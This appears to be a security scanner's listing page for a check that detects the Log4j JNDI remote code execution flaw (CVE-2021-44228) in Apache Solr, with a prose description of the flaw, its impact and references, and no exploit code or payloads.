Apache Solr Remote Code Execution Scanner
Detects 'Remote Code Execution (RCE)' vulnerability in Apache Solr affects v. 7+.
Short Info
Level
Critical
Single Scan
Single Scan
Can be used by
Asset Owner
Estimated Time
1 minute
Time Interval
19 days
Scan only one
Domain, IPv4, Subdomain
Toolbox
-
Apache Solr is an open-source enterprise search platform used for building search applications. It is primarily used by developers and organizations aiming to enable advanced search and indexing features within their applications. Solr is designed to be highly reliable, scalable, and fault-tolerant. With REST-like HTTP/XML and JSON APIs, it is particularly suited for use cases requiring full-text search capabilities. The platform can be deployed on premises or in cloud environments, making it versatile for integrating into various infrastructures. Organizations across different industries utilize Solr for powering search and navigation in their websites and applications.
Remote Code Execution (RCE) is a severe vulnerability that allows attackers to execute arbitrary code on a remote system. When exploited, this vulnerability could enable an attacker to perform any action that the application itself can perform. RCE vulnerabilities are critical because they compromise the integrity, confidentiality, and availability of the application and its data. Such vulnerabilities often arise from improper handling of user input, where malicious inputs are executed as part of the application's code. Detection and remediation of RCE vulnerabilities are crucial to maintaining application security.
The vulnerability involves the exploitation of JNDI features within Apache Log4j versions up to and including 2.14.1. These features are improperly secured, enabling attacker-controlled LDAP and other JNDI-related endpoints. For Apache Solr, a specific endpoint in the Solr admin interface is vulnerable, potentially allowing crafted requests to be executed remotely. The issue lies in the handling of configuration, log messages, and parameters where JNDI URLs are used unsafely. Correctly patching and securing these endpoints is essential to prevent exploitation.
Exploiting this vulnerability can lead to complete application takeover, resulting in unauthorized data access, data loss, or system downtime. Attackers could install backdoors, exfiltrate sensitive information, or deploy ransomware. The failure to address this vulnerability could have significant financial and reputational impacts on affected organizations. Furthermore, a compromised system might be used as a pivot point for attacking other networked systems, compounding the risk.
REFERENCES
- https://solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228
- https://twitter.com/sirifu4k1/status/1470011568834424837
- https://github.com/apache/solr/pull/454
- https://logging.apache.org/log4j/2.x/security.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
- https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2021-44228
